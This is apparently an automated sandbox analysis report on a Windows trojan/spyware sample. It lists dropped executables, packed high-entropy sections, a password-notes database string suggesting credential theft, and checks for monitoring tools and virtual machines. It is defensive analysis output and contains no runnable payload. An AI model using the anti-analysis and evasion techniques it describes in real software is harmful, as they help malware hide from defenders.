          Source: file.exe, 00000000.00000003.2378995873.0000000006261000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2357436905.0000000006132000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2325727404.0000000005CB6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2338044191.0000000006052000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2378885443.000000000615F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2329086293.0000000006060000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2340368902.0000000006118000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2339257889.00000000061C1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2339794356.000000000605B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2335678303.00000000060FE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2348945509.000000000605F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2349880261.0000000006128000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2430697605.0000000006057000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2330262930.0000000006058000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2354227900.000000000605B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2428965673.0000000005BDC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2342186585.000000000611A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2344890110.00000000061E0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2361401373.000000000614F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2329641046.00000000060FE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2382340736.0000000006054000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2333913067.0000000006053000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2351397354.0000000006056000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2440799447.0000000006056000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2328437787.0000000005CB3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2332109412.0000000006055000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2437050361.00000000061C1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2358933757.0000000006147000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2429145057.00000000014E4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2358216834.000000000621B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2326706745.000000000605C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2444859169.00000000061BD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2365661778.0000000006054000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2350515105.000000000605E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2381801345.0000000006166000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2444639061.0000000006052000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2321936060.0000000005CBC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2333307148.00000000060F6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2349462654.0000000006056000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2441907683.00000000061BF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2362097050.000000000605A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2332655238.00000000060F3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2364890833.0000000006057000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2334500474.000000000605B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2359401964.000000000605A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2334017234.00000000060FC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2337952677.0000000006120000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2364475533.000000000615B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2446643775.0000000006054000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2434404789.0000000006308000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2341880803.000000000605E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2345584361.0000000006124000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2381685106.0000000006060000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2382104081.0000000006163000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2360591780.0000000006143000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2438253497.000000000605E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2446207769.00000000061C9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2429051638.0000000005BBC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2381915087.0000000006057000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2382221589.0000000006281000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2339001420.0000000006053000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2434223389.00000000061A7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2323128433.000000000605A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2321308898.0000000005E52000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2327894283.0000000006059000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: file.exeStatic PE information: Section: ZLIB complexity 0.9979917711598746
          Source: 0L9V49BGE9BOE4IYXIIV26RZIS7RT6.exe.0.drStatic PE information: Section: ZLIB complexity 0.998046875
          Source: 0L9V49BGE9BOE4IYXIIV26RZIS7RT6.exe.0.drStatic PE information: Section: whlejstb ZLIB complexity 0.9953509637245962
          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@4/3@5/2
          Source: C:\Users\user\AppData\Local\Temp\UK2346Q4E08RPNV0H.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\UK2346Q4E08RPNV0H.exe.logJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\UK2346Q4E08RPNV0H.exeMutant created: NULL
          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\UK2346Q4E08RPNV0H.exeJump to behavior
          Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: file.exe, 00000000.00000003.2171713031.0000000005BFB000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2156844306.0000000005BE9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2172032225.0000000005BEE000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2157025323.0000000005BCC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
          Source: file.exeReversingLabs: Detection: 42%
          Source: UK2346Q4E08RPNV0H.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
          Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\UK2346Q4E08RPNV0H.exe "C:\Users\user\AppData\Local\Temp\UK2346Q4E08RPNV0H.exe"
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\UK2346Q4E08RPNV0H.exe "C:\Users\user\AppData\Local\Temp\UK2346Q4E08RPNV0H.exe"Jump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: webio.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: schannel.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: mskeyprotect.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: ncryptsslp.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\UK2346Q4E08RPNV0H.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\UK2346Q4E08RPNV0H.exeSection loaded: winmm.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\UK2346Q4E08RPNV0H.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\UK2346Q4E08RPNV0H.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\UK2346Q4E08RPNV0H.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\UK2346Q4E08RPNV0H.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\UK2346Q4E08RPNV0H.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\UK2346Q4E08RPNV0H.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\UK2346Q4E08RPNV0H.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\UK2346Q4E08RPNV0H.exeSection loaded: sspicli.dllJump to behavior
          Source: file.exeStatic file information: File size 2940416 > 1048576
          Source: file.exeStatic PE information: Raw size of hdsdqunw is bigger than: 0x100000 < 0x2a2200
          Source: Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: UK2346Q4E08RPNV0H.exe, 00000006.00000002.2730893202.0000000000CB2000.00000040.00000001.01000000.00000006.sdmp, UK2346Q4E08RPNV0H.exe, 00000006.00000003.2597529409.00000000048A0000.00000004.00001000.00020000.00000000.sdmp

          Data Obfuscation

          barindex
          Source: C:\Users\user\AppData\Local\Temp\UK2346Q4E08RPNV0H.exeUnpacked PE file: 6.2.UK2346Q4E08RPNV0H.exe.cb0000.0.unpack :EW;.rsrc:W;.idata :W;gwksigml:EW;xtwnmccs:EW;.taggant:EW; vs :ER;.rsrc:W;
          Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
          Source: 0L9V49BGE9BOE4IYXIIV26RZIS7RT6.exe.0.drStatic PE information: real checksum: 0x1cce32 should be: 0x161e2d
          Source: UK2346Q4E08RPNV0H.exe.0.drStatic PE information: real checksum: 0x2b3680 should be: 0x2baa8c
          Source: file.exeStatic PE information: real checksum: 0x2dcec6 should be: 0x2d8336
          Source: file.exeStatic PE information: section name:
          Source: file.exeStatic PE information: section name: .idata
          Source: file.exeStatic PE information: section name: hdsdqunw
          Source: file.exeStatic PE information: section name: hndbucrw
          Source: file.exeStatic PE information: section name: .taggant
          Source: UK2346Q4E08RPNV0H.exe.0.drStatic PE information: section name:
          Source: UK2346Q4E08RPNV0H.exe.0.drStatic PE information: section name: .idata
          Source: UK2346Q4E08RPNV0H.exe.0.drStatic PE information: section name: gwksigml
          Source: UK2346Q4E08RPNV0H.exe.0.drStatic PE information: section name: xtwnmccs
          Source: UK2346Q4E08RPNV0H.exe.0.drStatic PE information: section name: .taggant
          Source: 0L9V49BGE9BOE4IYXIIV26RZIS7RT6.exe.0.drStatic PE information: section name:
          Source: 0L9V49BGE9BOE4IYXIIV26RZIS7RT6.exe.0.drStatic PE information: section name: .idata
          Source: 0L9V49BGE9BOE4IYXIIV26RZIS7RT6.exe.0.drStatic PE information: section name:
          Source: 0L9V49BGE9BOE4IYXIIV26RZIS7RT6.exe.0.drStatic PE information: section name: whlejstb
          Source: 0L9V49BGE9BOE4IYXIIV26RZIS7RT6.exe.0.drStatic PE information: section name: gsptuyyn
          Source: 0L9V49BGE9BOE4IYXIIV26RZIS7RT6.exe.0.drStatic PE information: section name: .taggant
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_014ED941 push ebp; iretd 0_3_014ED942
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_014ED941 push ebp; iretd 0_3_014ED942
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_014ED941 push ebp; iretd 0_3_014ED942
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_014ED941 push ebp; iretd 0_3_014ED942
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_014EA2DA pushad ; ret 0_3_014EA2E5
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_014EA2DA pushad ; ret 0_3_014EA2E5
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_014EA2DA pushad ; ret 0_3_014EA2E5
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_014EA2DA pushad ; ret 0_3_014EA2E5
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_014ED959 push ebp; retf 006Eh0_3_014ED95A
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_014ED959 push ebp; retf 006Eh0_3_014ED95A
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_014ED959 push ebp; retf 006Eh0_3_014ED95A
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_014ED959 push ebp; retf 006Eh0_3_014ED95A
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_0146D842 push ebp; retf 0_3_0146D86A
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_0146D842 push ebp; retf 0_3_0146D86A
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_0146CB4C pushad ; retf 0_3_0146CB55
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_0146CB4C pushad ; retf 0_3_0146CB55
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_0146CB48 push eax; retf 0_3_0146CB49
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_0146CB48 push eax; retf 0_3_0146CB49
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_01471910 pushad ; retf 0_3_01471911
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_01471910 pushad ; retf 0_3_01471911
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_0146D818 push ebp; retf 0_3_0146D86A
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_0146D818 push ebp; retf 0_3_0146D86A
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_0146E830 push ebx; ret 0_3_0146E832
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_0146E830 push ebx; ret 0_3_0146E832
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_01469DC8 pushad ; retf 0_3_01469DC9
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_01469DC8 pushad ; retf 0_3_01469DC9
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_0146DFE3 push edx; retf 006Eh0_3_0146E07A
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_0146DFE3 push edx; retf 006Eh0_3_0146E07A
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_01472398 push ds; retf 0_3_0147239A
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_01472398 push ds; retf 0_3_0147239A
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_014ED941 push ebp; iretd 0_3_014ED942
          Source: file.exeStatic PE information: section name: entropy: 7.973473510765359
          Source: UK2346Q4E08RPNV0H.exe.0.drStatic PE information: section name: entropy: 7.768952555904265
          Source: 0L9V49BGE9BOE4IYXIIV26RZIS7RT6.exe.0.drStatic PE information: section name: entropy: 7.981204341278881
          Source: 0L9V49BGE9BOE4IYXIIV26RZIS7RT6.exe.0.drStatic PE information: section name: whlejstb entropy: 7.950135175881318
          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\UK2346Q4E08RPNV0H.exeJump to dropped file
          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\0L9V49BGE9BOE4IYXIIV26RZIS7RT6.exeJump to dropped file

          Boot Survival

          barindex
          Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
          Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
          Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
          Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
          Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
          Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonclassJump to behavior
          Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonclassJump to behavior
          Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
          Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonclassJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\UK2346Q4E08RPNV0H.exeWindow searched: window name: FilemonClassJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\UK2346Q4E08RPNV0H.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\UK2346Q4E08RPNV0H.exeWindow searched: window name: RegmonClassJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\UK2346Q4E08RPNV0H.exeWindow searched: window name: FilemonClassJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\UK2346Q4E08RPNV0H.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\UK2346Q4E08RPNV0H.exeWindow searched: window name: RegmonclassJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\UK2346Q4E08RPNV0H.exeWindow searched: window name: FilemonclassJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\UK2346Q4E08RPNV0H.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\UK2346Q4E08RPNV0H.exeWindow searched: window name: RegmonclassJump to behavior
          Source: C:\Users\user\Desktop\file.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
          Source: C:\Users\user\Desktop\file.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\UK2346Q4E08RPNV0H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\UK2346Q4E08RPNV0H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\UK2346Q4E08RPNV0H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\UK2346Q4E08RPNV0H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\UK2346Q4E08RPNV0H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\UK2346Q4E08RPNV0H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\UK2346Q4E08RPNV0H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\UK2346Q4E08RPNV0H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\UK2346Q4E08RPNV0H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\UK2346Q4E08RPNV0H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\UK2346Q4E08RPNV0H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\UK2346Q4E08RPNV0H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\UK2346Q4E08RPNV0H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\UK2346Q4E08RPNV0H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\UK2346Q4E08RPNV0H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\UK2346Q4E08RPNV0H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          barindex
          Source: C:\Users\user\Desktop\file.exeSystem information queried: FirmwareTableInformationJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\UK2346Q4E08RPNV0H.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\UK2346Q4E08RPNV0H.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
